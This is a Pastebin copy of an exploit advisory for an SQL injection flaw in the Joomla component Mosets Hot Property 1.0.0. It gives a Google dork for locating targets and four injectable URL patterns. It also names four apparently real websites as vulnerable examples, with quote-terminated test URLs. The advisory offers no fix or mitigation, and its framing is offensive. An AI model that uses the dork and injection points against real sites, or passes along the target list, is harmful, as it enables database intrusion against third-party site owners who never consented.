Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla Mosets Hot Property 1.0.0 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 12/02/2019
- # Vendor Homepage : mosets.com/hotproperty/
- # Software Download Link : vip-file.net/download/847ea7616390/MosetsHotProperty0.98Full.rar.html
- # Software Information Link : joomfans.com/joomla-components/mosets-hot-property-v100.html
- # Software Version : 1.0.0
- Compatible with Joomla! 1.0.x - 1.5.x
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_hotproperty''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Hot Property allows you to manage properties in your website in an easy and effective
- way while using Joomla!. This powerful combination enable you to run a real estate
- website and use the most user friendly open source Web Content Management
- System (CMS) available today.
- ####################################################################
- # Impact :
- ***********
- Joomla Mosets Hot Property 1.0.0 and other versions -
- component for Joomla is prone to an SQL-injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_hotproperty&task=view&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_hotproperty&task=viewtype&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_hotproperty&view=type&id=[ID-NUMBER]&sort=price&order=asc&limit=[ID-NUMBER]&limitstart=[SQL Injection]
- /index.php?option=com_hotproperty&task=viewtype&id=[ID-NUMBER]&sort=name&order=asc&Itemid=[ID-NUMBER]&limit=[ID-NUMBER]&limitstart=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] s188921642.websitehome.co.uk/horizon/index.php?option=com_hotproperty&task=view&id=39&Itemid=27%27
- [+] mail.costablancabargainproperties.com/index.php?option=com_hotproperty&view=type&id=0&sort=price&order=asc&limit=15&limitstart=90%27
- [+] jurcevic.hr/index.php?option=com_hotproperty&task=viewtype&id=2&sort=name&order=asc&Itemid=29&limit=5&limitstart=5%27
- [+] simplequiltmaking.com/index.php?option=com_hotproperty&task=viewtype&id=1&Itemid=32%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Deprecated: Function eregi() is deprecated in /home/simplequ/public_html/includes/sef.php on line 533
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment